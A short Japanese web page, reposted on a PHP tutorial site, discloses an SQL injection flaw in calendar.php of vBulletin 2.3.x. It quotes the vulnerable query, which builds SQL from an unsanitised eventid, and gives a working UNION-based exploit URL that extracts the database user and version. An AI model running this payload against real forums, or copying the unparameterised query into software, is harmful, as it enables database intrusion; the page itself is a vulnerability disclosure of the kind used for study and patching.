ホームページ > php教程 > php手册 > vBulletin フォーラム 2.3.xx SQL インジェクション

vBulletin フォーラム 2.3.xx SQL インジェクション

WBOY
リリース: 2016-06-13 12:44:27
オリジナル
1541 人が閲覧しました


vBulletin フォーラム 2.3.xx SQL インジェクション Calendar.php に SQL インジェクションの問題が存在します。

-------- Calendar.php の 585 行目から切り取り ----------
else if ($ action == "edit")
{
$eventinfo = $DB_site->query_first("SELECT allowedmilies,public,userid,
eventdate,event,subject FROM Calendar_events WHEREeventid = $eventid");
----------------------------------------------- ------

MySQL バージョンが 4.00 より大きい場合、UNION 攻撃が使用される可能性があります。

----- ------------------------
http://ww.xxx.com/bbs/calendar.php?action=edit&eventid=12 Union (SELECT allowedmilies,public,userid,'0000-0-0',user(),version() FROM Calendar_ev
ents WHERE eventid = 13) order by eventsdate
---------- ------------------------

query_first 関数はクエリ結果の最初の行のみを返します。 !
必要なものが返されることを確認してください。

関連ラベル:
ソース:php.cn
このウェブサイトの声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。
人気のおすすめ
人気のチュートリアル
詳細>
最新のダウンロード
詳細>
ウェブエフェクト
公式サイト
サイト素材
フロントエンドテンプレート